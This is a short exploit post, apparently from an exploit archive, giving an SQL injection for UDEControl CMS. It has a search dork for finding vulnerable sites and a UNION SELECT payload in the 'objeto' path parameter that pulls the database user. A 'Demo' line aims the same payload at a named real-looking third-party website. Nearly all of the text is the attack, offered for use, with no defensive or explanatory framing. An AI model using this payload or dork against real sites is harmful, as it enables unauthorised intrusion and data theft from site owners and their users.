##################################################### > Exploit Title: SQL-Injection > Exploit Author: BannedExP | https://twitter.com/BannedExP | http://bannedexp.ga > Dork : Disseny Web: UDEControl CMS > Date : 2016/10/27 > Tested on : Debian 8 Jessie, Win 7 ##################################################### id: index.php/id/1/objeto/-1 UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- ##################################################### Demo: http://www.madera3.es/index.php/id/1/objeto/-1 UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- #####################################################